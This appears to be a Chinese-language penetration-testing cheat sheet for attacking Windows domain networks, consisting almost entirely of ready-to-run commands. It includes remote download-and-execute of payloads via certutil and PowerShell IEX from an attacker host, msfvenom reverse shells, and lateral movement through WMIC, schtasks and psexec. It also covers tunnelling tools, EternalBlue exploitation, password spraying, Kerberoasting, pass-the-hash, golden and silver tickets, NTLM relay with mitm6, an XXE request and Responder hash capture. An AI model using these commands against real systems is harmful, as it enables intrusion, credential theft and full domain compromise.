> atexec.exe ./administrator:pass@10.1.1.1 "certutil.exe -urlcache -split -f http://youip.com:80/shell.txt c:/windows/debug/SysDug.exe"
> atexec.exe ./administrator:pass@10.1.1.1 "c:/windows/debug/SysDug.exe"
> atexec.exe ./administrator:pass@10.1.1.1 "certutil.exe -urlcache -split -f c:/windows/debug/SysDug.exe delete"
> net use \\192.168.0.55\ipc$ "password" /user:"domain\administrator"
> schtasks /query /fo LIST /v 查看计划任务
上传文件
> copy ok.exe \\192.168.0.55\c$\windows\temp
远程创建定时任务
> schtasks /create /s "192.168.0.55" /u "admin" /p "qqq23" /RL HIGHEST /F /tn "windowsupdate" /tr "c:\windows\temp\ok.exe" /sc DAILY /mo 1 /ST 20:28 /RU SYSTEM
查询远程创建的任务
> schtasks /query /s "192.168.0.55" /U "admin" /P "qqq23" | findstr "windowsupdate"
立即执行远程任务
> schtasks /run /tn windowsupdate /s "192.168.0.55" /U "admin" /P "qqq23"
删除定时任务
> schtasks /Delete /tn windowsupdate /F /s "192.168.0.55" /u "admin" /p "qqq23"
删除IPC
> net user name /del /y
横向批量上线
> for /f %i in (ip.txt) do net use \\%i\admin$ /user:"administrator" "password" & if %errorlevel% equ 0 ( copy ok.exe \\%i\admin$\debug\ /Y ) & wmic /NODE:"%i" /user:"administrator" /password:"password" PROCESS call create "c:\windows\debug\ok.exe" & @ping 127.0.0.1 -n 8 >nul & net use \\%i\admin$ /del
WMIC > net use \\192.168.0.55\ipc$ "password" /user:"domain\administrator"
> copy ok.exe \\192.168.0.55\c$\windows\temp
> wmic /NODE:" 192.168.0.55" /user:"administrator" /password:"password" PROCESS call create "c:\windows\temp\ok.exe"
> del \\192.168.0.55\c$\windows\temp\ok.exe /F
> net use \\192.168.0.55\c$ /del
快速定位域管理登过的机器 >psexec –accepteula @ips.txt –u admin –p pass@123 –c 1 .bat
tasklist /v | find “域管理名字”
@echo off
echo check ip addr config file…
if not exist ip.txt echo ip addr config file ip.txt does not exist! & goto end
echo read and analysis file…
for /F “eol=
:end
exit
MSF添加路由 # route add 内网网卡ip 子网掩码 session的id
# route list
&
Meterpreter> run get_local_subnets查看网段信息再添加路由
# run autoroute -s内网网卡ip/24
# run autoroute -p 查看路由表
&
Meterpreter> run post/multi/manage/autoroute
MSF管道监听 在已经获得meterpreter的机器上配置管道监听器
meterpreter > pivot add -t pipe -l 已控IP -n bgpipe -a x86 -p windows
生成
> msfvenom -p windows/meterpreter/reverse_named_pipe PIPEHOST=已控IP PIPENAME=bgpipe -f exe -o pipe.exe.
代理
SSH 正向代理 SSH动态转发,是建立正向加密的socks通道
出网靶机编辑后restart ssh服务
AllowTcpForwarding yes 允许TCP转发
GatewayPorts yes 允许远程主机连接本地转发的端口
TCPKeepAlive yes TCP会话保持存活
PasswordAuthentication yes 密码认证
外部攻击机执行
>ssh -C -f -N -g -D 0.0.0.0:12138 root@出网靶机IP -p 22
MSF中设置全局代理或使用其他软件
>setg proxies socks5:0.0.0.0:12138
即可进行攻击隔离区机器
反向代理
AllowTcpForwarding yes 允许TCP转发
GatewayPorts yes 允许远程主机连接本地转发的端口
TCPKeepAlive yes TCP会话保持存活
PasswordAuthentication yes 密码认证
ClientAliveInterval 修改为30-60保持连接
ClientAliveCountMax 取消注释 发送请求没响应自动断开次数
107是外网攻击机
内网靶机执行:
>ssh -p 22 -qngfNTR 12138:127.0.0.1 :22 root @192 .168 .0 .107
攻击机执行
>ssh -p 12138 -qngfNTD 12345 root @192 .168 .0 .107
隧道建立,可使用代理软件配置攻击机外网IP:12345访问内网
SSH隧道+rc4双重加密 生成木马
> msfvenom -p windows/x64/meterpreter/bind_tcp_rc4 rc4password=123456 lport=446 -f exe -o /var/www/html/bind.exe
MSF设置
> setg proxies socks5:0.0.0.0:12138
> use exploit/multi/handler
> set payload windows/x64/meterpreter/bind_tcp_rc4
> set rc4password 123456
> set rhost 10.1.1.97
> set lport 446
公网SSH隧道+Local MSF > msfvenom -p windows/x64/meterpreter/reverse_tcp -e x64/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=公网IP LPORT=12138 -f exe –o /var/www/html/1.exe
Handler监听本地IP:12138
SSH转发
> ssh -N -R 12138:本地内网IP:12138 root@公网IP
socks4a
多层网络
再多配置个端口
Win : Proxifier& Sockscap64
Linux : proxychains& 浏览器
&
meterpreter > ipconfig
IP Address : 10.1.13.3
meterpreter > run autoroute -s 10.1.13.0/24
meterpreter > run autoroute -p
10.1.13.0 255.255.255.0 Session 1
meterpreter > bg
msf auxiliary(tcp) > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 10.1.13.2
msf exploit(psexec) > exploit
socks5
# use auxiliary/server/socks5
# set srvhost 0.0.0.0
# set srvport 1080
# run
浏览器
基于web的socks5
reGeorg
https://github.com/sensepost/reGeorg
>python reGeorgSocksProxy.py -u http://靶机/tunnel.aspx -l 外网IP -p 10080
打开Proxifier,更改为脚本指定的端口10080
或proxychains
去掉dynamic_chain注释>添加socks5 127.0.0.1 10080
或MSF
或MSF
> setg proxies socks5:外网IP:10080
> setg ReverseAllowProxy true 允许反向代理
Neo-reGeorg
Step 1 . 设置密码生成 tunnel.(aspx|ashx| jsp|jspx| php) 并上传到WEB服务器
$ python3 neoreg.py generate -k password
伪装页面
$ python3 neoreg.py generate -k <you_password> --file 404 .html
Step 2 . 使用 neoreg.py 连接WEB服务器,在本地建立 socks 代理
$ python3 neoreg.py -k password -u http: //xx/tunnel .php
$ python3 neoreg.py -k <you_password> -u <server_url> --skip
开启代理
$ python neoreg.py -k <you_password> -l 外网IP -p 10081 -u http: //xx/neo -tunnel.aspx
ABPTTS端口转发
https://github.com/nccgroup/ABPTTS
端口转发
> python abpttsfactory.py -o webshell 生成shell
./webshell目录下生成的相应脚本文件传入目标中
> python abpttsclient.py -c webshell/config.txt -u "http://目标网址/trans.aspx" -f 攻击机IP:12345/目标IP:3389
ABPTTS转发内网其他机器端口
>python abpttsclient.py -c webshell/config.txt -u http:
要转发多个机器或多个端口
>python abpttsclient.py -c webshell/config.txt -u http:
SSH 代理一级网段
需要一台有权限的Linux 靶机
>python abpttsclient.py -c webshell/config.txt -u http:
>ssh -p 222 -qTfnN -D 0.0 .0.0 :1081 root@192.168 .0.107
配置proxychains即可
SSH代理二级网段
需要靶机web权限,一级内网一台web权限
转发内网web出来传入abptts的shell
>python abpttsclient.py -c webshell/config.txt -u http:
>python abpttsclient.py -c webshell/config.txt -u http:
SSH 连接192.168 .0.107 :222 即可到达二级网络
反弹msf
kali生成bind型脚本
>msfvenom -p linux/x64/shell_bind_tcp LPORT =12138 -f elf -o shell
在二级不出网linux上执行
将他的12138 端口通过abptts转出
>python abpttsclient.py -c webshell/config.txt -u http:
Msf 本地监听13128 即可
Tunna转发
>python proxy.py -u http:
Earthworm
正向(目标机存在外网IP):
> ew –s ssocksd –l 888
连接sockscap64靶机外网IP+端口888
反弹socks5(目标机无外网IP): 外网攻击机:
> ew -s rcsocks -l 1008 -e 888
-l为socks软件连接的端口,-e为目标主机和vps的通信端口。
靶机:
> ew -s rssocks -d 外网IP -e 1008
sockscap64连接攻击机外网IP+端口1008
二级环境(A有外网,B内网无外网):
靶机B:
> ew –s ssocksd –l 888
靶机A:
> ew –s lcx_tran –l 1080 –f 靶机B –g 888
Sockscap64连接靶机外网IP+端口 1080
二级环境(A无外网,B内网无外网):
外网攻击机:
> ew –s lcx_listen –l 10800 –e 888
靶机B:
> ew –s ssocksd –l 999
靶机A:
> ew -s lcx_slave -d 外网 -e 8888 -f 靶机B -g 9999
Sockscap64连接攻击机外网IP+端口 10080
三级环境(A无外网,B内网无外网通A,C通B): 外网攻击机:
> ew -s rcsocks -l 1008 -e 888
靶机A:
> ew -s lcx_slave -d 外网攻击机 -e 888 -f 靶机B -g 999
靶机B:
> ew -s lcx_listen -l 999 -e 777
靶机C:
> ew -s rssocks -d靶机B -e 777
Sockscap64连接攻击机外网IP+端口 1008
Frp
https://github.com/fatedier/frp/releases/
使用条件:目标主机通外网,拥有自己的公网ip
对攻击机外网服务端frps.ini进行配置
[common]
bind_port=8080
靶机客户端
[common]
server_addr=服务器端外网IP
server_port=8080
[socks5]
type=tcp
remote_port=12345
plugin=socks5
use_encryption=true
use_compression=true
以上是启用加密和压缩,能躲避流量分析设备。
上传frpc.exe和frpc.ini到目标服务器上,直接运行frpc.exe(在实战中可能会提示找不到配置文件,需要使用-c参数指定配置文件的路径frpc.exe -c 文件路径),可以修改文件名和配置名以混淆视听。
公网vps主机上运行./frps –c frps.ini
靶机执行./frpc –c frpc.ini
MSF中设置全局变量
> setg proxies 公网IP:12345
> setg ReverseAllowProxy true 运行反向代理
结束攻击
tasklist
taskkill /pid 进程号 -t –f
SSF https: //github.com/securesocketfunneling /ssf/releases
正向socks代理
边界机器执行:
> ssfd.exe -p 1080 linux执行:./ssfd -p 1080
攻击机执行:
>ssf .exe -D 12138 -p 1080 192.168 .0 .98 (边界机器IP )
本机配置proxychain或proxifier
反向socks代理
内网机器执行:
>ssf .exe -F 12138 -p 1080 192.168 .0 .106 (攻击机IP )
多级级联
多级内网机执行:
>ssfd.exe -p 1080 -c config.json
Json 文件加入字段
"circuit" : [
{"host" : "A中继机IP" , "port" :"1080" },
{"host" : "B中继机IP" , "port" :"1080" }
],
所有中继机执行:
>ssfd.exe -p 1080 -c config.json
边界机器执行:
>ssf.exe -c config.json -p 1080 多级内网机IP -X 12138
边界机执行:
>nc.exe 127.0 .0.1 12138 即可获得多级内网机cmdshell
反弹shell
攻击机执行:
>ssfd .exe -p 1080 -c config .json
内网机器执行
攻击机执行:
Shadowsocks
https: //github.com/shadowsocks /libQtShadowsocks/releases /download/v 2.0 .2 /shadowsocks-libqss-v2.0 .2 -win64.7 z
靶机新建配置文件1 .json,内容为
{
"server" :"0.0.0.0" ,
"server_port" : 13337 ,
"local_address" :"127.0.0.1" ,
"local_port" : 1080 ,
"password" :"123456" ,
"timeout" : 300 ,
"method" :"aes-256-cfb" ,
"fast_open" :false ,
"workers" : 1
}
执行
>shadowsocks-libqss.exe -c 1 .json –S
攻击机配置
浏览器或其他攻击软件配置代理127.0.0.1:1080即可(需有http(s)/socks5功能)
Goproxy
https:
靶机执行
>proxy.exe socks -t tcp -p "0.0.0.0:13337"
攻击机配置Proxifier
Chisel
https: //github.com/jpillora /chisel/releases
攻击机监听
>chisel.exe server -p 12138 --reverse
靶机执行
>chisel .exe client 192.168 .0 .102 :12138 R :12345 :127.0.0.1 :12346
靶机执行
> chisel.exe server -p 12346 --socks5
攻击机执行
>chisel .exe client 127.0 .0 .1 :12345 socks
当隧道建立成功时,攻击机本地会启动1080端口
即可使用
https:
https:
下载ngrok
#ngrok authtoken 授权码
#ngrok http 8080
#ngrok tcp 8888
代理软件 Sockscap64
Proxifier
Proxychains
去掉dynamic_chain注释>添加socks4 127.0.0.1 1080
Ngrok内网穿透 https:
https:
下载ngrok
#ngrok authtoken 授权码
#ngrok http 8080
#ngrok tcp 8888
MS17-010
扫描
# use auxiliary/scanner/smb/smb_ms17_010
# set rhosts 192.168.1.0/24
&
# nmap -sT -p 445,139 -open -v -Pn --script=smb-vuln-ms17-010.nse 10.11.1.0/20
攻击
# use exploit/windows/smb/ms_17_010_eternalblue易蓝屏
# set payload windows/x64/meterpreter/reverse_tcp
# use auxiliary/admin/smb/ms17_010_command
# set command REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f
MS08_067 # nmap -sT -p 445,139 -open -v -Pn --script=smb-vuln-ms08-067.nse 10.11.1.0/20
# use exploit/windows/smb/ms08_067_netapi
# set payload windows/meterpreter/reverse_tcp
CVE-2019-0708
攻击MySQL数据库
攻击MSSQL数据库
> PowerShell -Command "[System.Data.Sql.SqlDataSourceEnumerator]::Instance.GetDataSources()" 列出域内mssql主机
https://github.com/NetSPI/PowerUpSQL
> Get-SQLInstanceLocal
> Get-SQLInstanceDomain
> Get-SQLInstanceBroadcast
> $Targets = Get-SQLInstanceBroadcast -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 -username sa -password admin | Where-Object {$_ .Status -like "Accessible" } 工作组mssql爆破
> $Targets = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 -username sa -password admin | Where-Object {$_ .Status -like "Accessible" }
> Get-SQLInstanceBroadcast -Verbose | Get-SQLServerLoginDefaultPw –Verbose
> $Targets 域内MSSQL爆破
Nishang脚本爆破MSSQL
> Invoke-BruteForce -ComputerName dc.zone.com -UserList C:\test \users.txt -PasswordList C:\test \wordlist.txt -Service SQL -Verbose -StopOnSuccess
# use auxiliary/scanner/mssql/mssql_login 爆破主机
# use auxiliary/admin/mssql/mssql_exec 调用cmd
# use auxiliary/admin/mssql/mssql_sql 执行SQL语句
# use exploit/windows/mssql/mssql_payload 上线MSSQL主机
http://192.168.0.107/ps/nishang/Execution/Execute-Command-MSSQL.ps1
导入nishang执行MSSQL命令的脚本
> IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Execution/Execute-Command-MSSQL.ps1' )
> Execute-Command-MSSQL -ComputerName 192.168.0.98 -UserName sa -Password admin 会返回powershell
# use auxiliary/scanner/mssql/mssql_hashdump 导出MSSQL密码
已知服务器ntlmhash,未知mssql账号密码
Hash注入+socks无密码连接mssql
> mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:. /ntlm:{hash} /run:\"C:\*\SocksCap64\SocksCap64_RunAsAdmin.exe\"" "exit"
将SSMS.exe加入sockscap中启动
命令行版sqltool
https://github.com/uknowsec/SharpSQLTools
隔离主机payload
隔离主机一般与攻击机无双向路由,payload设置为bind让靶机监听。
> set payload windows/meterpreter/bind_tcp
> set RHOST 隔离机IP
爆破 Hydra
参数:
-l 指定的用户名 -p 指定密码
-L 用户名字典 -P 密码字典
-s 指定端口 -o 输出文件
> hydra -L /root/user.txt -P pass.txt 10.1.1.10 mysql
> hydra -L /root/user.txt -P pass.txt 10.1.1.10 ssh -s 22 -t 4
> hydra -L /root/user.txt -P pass.txt 10.1.1.10 mssql -vv
> hydra -L /root/user.txt -P pass.txt 10.1.1.10 rdp -V
> hydra -L /root/user.txt -P pass.txt smb 10.1.1.10 -vV
> hydra -L /root/user.txt -P pass.txt ftp://10.1.1.10
Medusa
参数:
-h 目标名或IP -H 目标列表
-u 用户名 -U 用户名字典
-p 密码 -P 密码字典 -f 爆破成功停止 -M 指定服务 -t 线程
-n 指定端口 -e ns 尝试空密码和用户名密码相同
>medusa -h ip -u sa -P /pass.txt -t 5 -f -M mssql
>medusa -h ip -U /root/user.txt -P /pass.txt -t 5 -f -M mssql
域内爆破 Kerbrute
https:
用户枚举
>kerbrute_windows_amd64.exe userenum -d zone.com username.txt
密码喷射
>kerbrute_windows_amd64 .exe passwordspray -d zone .com use .txt password
密码爆破 此项会产生日志
>kerbrute_windows_amd64 .exe bruteuser -d zone .com pass .txt name
组合爆破
格式为username :password
>kerbrute_windows_amd64 .exe -d zone .com bruteforce com .txt
DomainPasswordSpray https:
自动收集账户进行密码喷射
>Invoke-DomainPasswordSpray -Password pass
组合爆破
>Invoke-DomainPasswordSpray -UserList users .txt -Domain zone .com -PasswordList passlist .txt -OutFile result .txt
会产生日志
单密码
>Invoke-DomainPasswordSpray -UserList users .txt -Domain zone .com -Password password
方程式内网不产生session msfvenom生成一个x64或x86的dll文件,替换该工具下的x64.dll或x86.dll
windows server 2008 ,msfvenom生成x64.dll文件
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12345 -f dll > x64.dll
msf配置
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lport 12345
set lhost 192.168.0.107
将该x64.dll替换到方程式利用工具下面。
只需要更换目标的IP,就可以获取session。
windows server 2003 ,msfvenom生成x86.dll文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12345 -f dll > x86.dll
msf配置
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 12345
set lhost 192.168.0.107
通过ms17_010_commend模块执行系统命令添加用户至管理员。再指定SMBPass和SMBUser来建立windows可访问命名管道
Kerberoasting SPN发现 cmd
Powershell
Powerview
> Get-NetComputer -SPN termsrv*
> Get-NetUser -SPN
>import module GetUserSPNs.ps1
Empire > usemodule situational_awareness/network/get_spn
申请票据 > Add-Type -AssemblyName System.IdentityModel
> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "SPN"
&
> kerberos::ask /target:SPN
导出票据 mimikatz>kerberos::list /export
破解密码 > python tgsrepcrack.py word.txt file.kirbi
https://github.com/leechristensen/tgscrack
> python extractServiceTicketParts.py file.kirbi
> tgscrack.exe -hashfile hash.txt -wordlist word.txt
重写票据 >python kerberoast .py -p Password123 -r file .kirbi -w new .kirbi -u 500
>python kerberoast .py -p Password123 -r file .kirbi -w new .kirbi -g 512
注入内存、
>kerberos ::ptt new .kirbi
GetUserSPNs https://github.com/SecureAuthCorp/impacket
请求TGS
> python GetUserSPNs.py -request -dc-ip 10.1.1.1 zone.com/y
破解
> hashcat -m 13100 -a 0 kerberos.txt wordlist.txt
ASEPRoasting 当用户关闭了kerberos预身份认证时可以进行攻击
> Rubeus.exe asreproast /user:y /dc:10.1.1.100 /domain:zone.com
或使用Powerview结合https://github.com/gold1029/ASREPRoast 获取不要求kerberos预身份验证的域内用户
> Get-DomainUser -PreauthNotRequired -Properties distinguishedname –Verbose
> Get-ASREPHash -UserName y -Domain zone.com -Verbose
破解RC4-HMAC AS-REP
> john hash.txt --wordlist=wordlist.txt
PASS-THE-HASH 允许本地管理组所有成员连接
> reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
WMIExec & TheHash > powershell -ep bypass
> IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-TheHash/Invoke-WMIExec.ps1' );
> IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-TheHash/Invoke-TheHash.ps1' );
> Invoke-TheHash -Type WMIExec -Target 192.168.0.0/24 -Domain zone.com -Username godadmin -Hash f1axxxxxxxxxb771
WMI > net use \\1.1.1.1\admin$ /user:"administrator" "password"
> copy windowsupdate.exe \\1.1.1.1\admin$\dir\
> wmic /NODE:"1.1.1.1" /user:"administrator" /password:"password" PROCESS call create "c:\windows\dir\windowsupdate.exe"
> del \\1.1.1.1\admin$\dir\windowsupdate.exe /F
> net use \\1.1.1.1\admin$ /del
wmiexec.py https: //github.com/ SecureAuthCorp/impacket
>python wmiexec.py -hashes AAD3B435B51404EEAAD3B435B51404EE: A812E6C2DEFCB0A7B80868F9F3C88D09 域名/Administrator@192.168.11 .1 "whoami"
>python wmiexec.py admin@192.168.1 .2
wmiexec.vbs 半交互式:
> cscript //nologo wmiexec.vbs /shell 192.168.1.2 admin pass
单条命令
> cscript //nologo wmiexec.vbs /cmd 192.168.1.2 domain\admin pass "whoami"
下载执行
> wmic /node:192.168.0.115 /user:godadmin /password:password PROCESS call create "cmd /c certutil.exe -urlcache -split -f http://192.168.0.107/clickme.exe c:/windows/temp/win.exe & c:/windows/temp/win.exe & certutil.exe -urlcache -split -f http://192.168.0.107/clickme.exe delete"
Powershell >wmic /NODE:192.168 .3.108 /user:"godadmin" /password:"password" PROCESS call create "powershell -nop -exec bypass -c \" IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.107/xxx.txt' );\""
Invoke-WMIExec
>powershell -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-WMIExec.ps1');Invoke-WMIExec -Target 192.168.0.115 -Domain Workgroup -Username godadmin -Hash f1a5b1a3641bec99ff92fe9df700b771 -Command \" net user admin Qwe@123 /add\" -Verbose"
> powershell -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-WMIExec.ps1');Invoke-WMIExec -Target 192.168.0.115 -Domain Workgroup -Username godadmin -Hash f1xxxxxxxxxxxxx771 -Command \"mshta http://192.168.0.107:8080/YAyAPN6odzbAzKn.hta\" -Verbose"
Psexec >psexec.exe -hashes AAD3B435B51404EEAAD3B435B51404EE:A812E6C2DEFCB0A7B80868F9F3C88D09域名/Administrator@192.168.1.1 "whoami" >psexec.exe –accepteula \\192.168.1.2 –u admin –p pass cmd.exe 无确认窗 Msf #use exploit/windows/smb/psexec #use exploit/windows/smb/psexec_psh(powershell版本)
Mimikatz Windows XP、Vista、2008 、7 、2008 r2 和2012 没有安装KB2871997补丁的机器上,使用NTLM进行PTH
mimikatz # privilege::debug
mimikatz # sekurlsa::pth /user:admin /domain:xxx.com /ntlm:{ntlm}
执行一个文件
mimikatz # sekurlsa::pth /user:admin /domain:xxx.com /ntlm:{ntlm} /run:powershell.exe
Windows 8.1 、2012 R2、安装KB2871997的Win 7 、2008 R2和2012 上可使用AES KEY进行PTH
>privilege::debug
>sekurlsa::ekeys
>sekurlsa::pth /user:administrator /domain:zone.com /aes128:{key}
pth-winexe >pth-winexe -U godadmin%password --system --ostype=1 //192.168 .0 .115 cmd
Smbexec >python smbexec .py administrator @192 .168 .0 .98
PASS-THE-TICKET 名词
KDC(Key Distribution Center):密钥分发中心,里面包含两个服务:AS 和TGS
AS (Authentication Server):身份认证服务
TGS(Ticket Granting Server):票据授予服务
TGT(Ticket Granting Ticket): 由身份认证服务授予的票据,用于身份认证,存储在内存,默认有效期为10 小时
黄金票据+Mimikatz Golden Ticket 伪造TGT (Ticket Granting Ticket ),可以获取任何Kerberos 服务权限,
域控中提取krbtgt 的hash
域控:dc .zone .com
域内机器:sub2k8 .zone .com
域内普通用户:y
域内机器是不能访问dc 上的文件
清空票据
域控中获取krbtgt用户的信息
> privilege::debug
> mimikatz log "lsadump::dcsync /domain:zone.com /user:krbtgt"
获取信息:/domain、/sid、/aes256
在sub2k8中生成golden ticket
> mimikatz “kerberos::golden /krbtgt:{ntlmhash} /admin:域管理 /domain:域名 /sid:sid /ticket:gold.kirbi”
导入
Mimikatz #kerberos ::ptt 123.kirbi
白银票据+Mimikatz
Silver Ticket 是伪造的TGS ,只能访问指定服务权限
域控:dc .zone .com
域内机器:sub2k8 .zone .com
域内普通用户:y
域控中导出
>privilege ::debug
>sekurlsa ::logonpasswords
Sub2k8伪造票据
> mimikatz "kerberos::golden /domain:zone.com /sid:{SID} /target:dc.zone.com /service:cifs /rc4:{NTLM} /user:y /ptt"
MS14-068 https: //github.com/abatchy 17/WindowsExploits/tree/master/MS14-06 8
https: //github.com/crupper /Forensics-Tool-Wiki/blob /master/windows Tools/PsExec64.exe
域控:dc.zone.com/10.1 .1.100
域内机器:sub2k8.zone.com/10.1 .1.98
域内普通用户:y,
Sub2k8中清除票据
Mimikatz
>whoami /user查看SID
创建ccache票据文件
> MS14-06 8.exe -u y@zone.com -p password -s S-1 -5 -21 -2346829310 -1781191092 -2540298887 -1112 -d dc.zone.com
注入票据
Mimikatz
psexec无密码登陆
>PsExec.exe \\dc.xx.com\ cmd.exe
Mimikatz+MSF > whoami /user 查看SID
msf >use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
msf >set domain 域名
msf >set password 密码
msf >set rhost 域控机器
msf >set user 用户
msf >set user_sid sid
得到.bin文件
# apt-get install krb5-user
上传mimikatz和bin文件
Mimikatz# Kerberos::clist “xxxx.bin” /export
生成kirbi文件
Meterpreter >load kiwi
Meterpreter >download c:/wmpub/xxxxxx.kirbi /tmp/
注入票据
Meterpreter >kerberos_ticket_use /tmp/xxxxxx.kirbi
# use exploit/windows/local /current_user_psexec
# set TECHNIQUE PSH
# set RHOST dc.xx.com
# set payload windows/meterpreter/reverse_tcp
# set LHOST 192.168.1.1
# set session 1
# exploit
goldenPac.py # exploit
kali下
# apt-get install krb5-user
# goldenPac.py –dc-ip 10.1.1.100 –target-ip 10.1.1.100 zone.com/y:password@dc.zone.com
账户委派 账户非受限委派 设置用户y为服务账户(服务账户有委派权限)
> setspn -U -A variant/golden y
查询非受限委派域内账号,使用powerview
> Get-NetUser -Unconstrained -Domain zone.com
利用
管理员权限打开mimikatz导出TGT
> privilege::debug
> sekurlsa::tickets /export
清空票据,导入票据
获得Powershell会话
> Enter-PSSession -ComputerName dc .zone .com
账户受限委派 查询受限委派用户
> Get-DomainUser -TrustedToAuth –Domain zone.com
查询受限委派主机
> Get-DomainComputer -TrustedToAuth -Domain zone.com
利用方法后见权限维持模块
资源受限委派 获取域管理员
> Get-DomainUser|select -First 1
域对象信息
> Get-DomainObject -Identity 'DC=zone,DC=com'
ms-ds-machineaccountquota允许非特权用户将最多 10 台计算机连接到域
查看有没有设置msDS-AllowedToActOnBehalfOfOtherIdentity策略
> Get-DomainComputer dc|select name, msDS-AllowedToActOnBehalfOfOtherIdentity
用powermad添加一具备SPN的机器账户
https:
>New -MachineAccount -MachineAccount newcom
或
> $pass = ConvertTo-SecureString '123qwe!@#' -AsPlainText –Force
> New-MachineAccount –MachineAccount newcom -Password $pass
或
> New-MachineAccount -MachineAccount newcom -Password $(ConvertTo-SecureString '123qwe!@#' -AsPlainText -Force)
获取添加的机器账户的SID
将添加的机器账户的SID设置给DC的msDS-AllowedToActOnBehalfOfOtherIdentity参数
>$SD=New -Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-2346829310-1781191092-2540298887-1122)" ; $SDBytes = New -Object byte[] ($SD.BinaryLength);$SD.GetBinaryForm($SDBytes, 0 );Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity' =$SDBytes}
设置完成后查看
配置ACL允许访问
> $RawBytes =Get-DomainComputer dc -Properties 'msds-allowedtoactonbehalfofotheridentity' |select -expand msds-allowedtoactonbehalfofotheridentity;$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes ,0;$Descriptor .DiscretionaryAcl
此时使用创建的机器账户的hash可伪造域管 先获取newcom的NTLM
> Rubeus.exe hash /password:123qwe!@
导入票据伪造域管用户访问cifs服务
> Rubeus.exe s4u /user:newcom$ /rc4:00AFFD88FA323B00D4560B F9FEF0EC2F /impersonateuser:godadmin /msdsspn:cifs/dc.zone.com /ptt
成功获取到godadmin的tgs
CVE-2019-0708 > python ntlmrelayx.py -t ldaps://dc.zone.com --remove-mic --delegate-access -smb2support
> python printerbug.py zone.com/y@win7.zone.com 192.168.0.attack
> python getST.py -spn host/win7.zone.com 'zone.com/机器账户$:密码' -impersionate administrator -dc-ip 192.168.0.1
> export KRB5CCNAME=XX.ccahe
> python secretdump.py -k -no-pass dc.zone.com -just-dc
NTLM中继 Ntlmrelayx+资源受限委派 域控需启用ldaps,域机器启用ipv6
*当执行ntlmrelayx脚本时,遇到报错
修改
impacket/impacket/examples/ntlmrelayx/attacks/ldapattack.py ldapattack.py脚本,在510 行上方加入
if self .config.interactive:
再重新安装>python setup .py install
使用mitm6 通过ipv6 接管dns 服务器,配置好后开始请求网络的WPAD
>mitm6 -i eth1 -d zone .com
使用ntlmreplyx.py监听
>python ntlmrelayx.py -t ldaps:
当目标重启网络、访问浏览器、重启电脑时会把攻击机视为代理服务器,当目标通过攻击机代理服务器访问网络时,攻击机将会向目标发送代理的认证请求,并中继NTLM认证到LDAP服务器上,完成攻击。
这里要使用ldaps,因为域控会拒绝在不安全的连接中创建账户。
可以看到
已经成功添加了一个机器账户RFAYOVCC密码6YdX.NXqQGyuR7[ 使用此机器账户申请票据
> python getST.py -spn cifs/sub2k8.zone.com zone.com/RFAYOVCC\$ -impersonate y
> export KRB5CCNAME=y.ccache
获取shell
> python smbexec.py -no-pass -k sub2k8.zone.com
dumphash 、缓存hash
>python secretsdump .py -k -no-pass sub2k8 .zone .com
当域控机器未启用LDAPS,并且已获得域普通用户权限时 使用powermad创建一个机器账户newcom
https:
>New-MachineAccount -MachineAccount newcom -Password $(ConvertTo-SecureString '123qwe!@#' -AsPlainText -Force)
或
>python ntlmrelayx.py -t ldaps:
后续正常操作即可。
内网存在java webdav时PROPPATCH、PROPFIND、 LOCK 等请求方法接受XML 作为输入时会形成xxe。攻击者要求采用NTLM认证方式是,webdav会自动使用当前用户的凭据认证。
使用ntlmrelayx监听
>python ntlmrelayx.py -t ldaps://dc.zone.com -debug -ip 10.1.1.101 --delegate-access --escalate-user newcom\$
Burp发送xxe请求
PROPFIND /webdav HTTP/1.1
Host: 1.1.1.1
<?xml version"1.0" encoding="UFT-8"?>
<!DOCTYPE xxe [
<!ENTITY loot SYSTEM "http://10.1.1.101"> ]>
<D:xxe xmln:D ="DAV:" > <D:set > <D:prop >
<a xmlns ="http://xx.e" > &loot;</a >
</D:prop > </D:set > </D:xxe >
Responder SMB协议截获 内网中间人攻击脚本,kali内置
监听网络接口
>responder -I wlan0(eth0)
指定某台机器或网段:修改/etc/responder/Responder.py中RespondTo参数。
网段中有认证行为会捕获NTLMv2 hash
当访问一个不存在的共享时修改配置文件来解析 Xp
修改/usr/share/responder/servers/SMB.py定位到errorcode修改为\x71\x00\x00\xc0,删除掉/usr/share/responder/Responder.db
XP时使用\\cmd\share形式访问共享输入密码达4次会断开连接。
定位到
修改self.ntry != 10 Win7以上
修改/usr/share/responder/servers/SMB.py定位到
删除掉and GrabMessageID(data)[0:1] == "\x02" ,删除掉/usr/share/responder/Responder.db
修改后可以进行解析,捕获hash ,否则会报错误64
WPAD代理欺骗 >responder -I eth0 -v -F
F参数即可开启强制WPAD认证服务抓取 hash ,访问IE或重启电脑即可发送欺骗认证获得hash 。
重启也可以抓到
